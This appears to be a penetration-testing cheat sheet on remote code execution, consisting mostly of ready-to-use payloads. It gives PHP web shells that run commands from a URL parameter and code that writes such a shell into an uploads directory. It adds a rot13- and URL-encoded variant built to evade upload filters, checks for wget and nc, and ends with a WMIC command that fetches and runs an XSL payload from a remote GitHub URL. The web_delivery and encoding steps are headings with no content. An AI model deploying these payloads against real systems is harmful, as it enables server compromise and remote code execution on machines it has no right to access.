[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Remote Code Execution

RCE

PHP RCE

  • Test a form for vulnerability to PHP RCE:
<?php phpinfo(); ?>
  • Get a remote PHP shell:
<?php system($_GET["c"]); ?>
<?php `$_GET["c"]`; ?>
  • Upload a file:
<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>
  • Evade file-type upload filters using rot13 + urlencode:
<?php
$payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E";
file_put_contents('/var/www/html/uploads/testfile.php',
str_rot13(urldecode($payload))); ?>

RCE via webshell


  • See if the target machine has handy utilities:
which wget

which nc

RCE via WMIC

Running Powershell on a target without Powershell installed:

Generate payload with web_delivery

 

Encode Payload

 

Include payload in xsl file

 

wmic process get brief /format:"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl"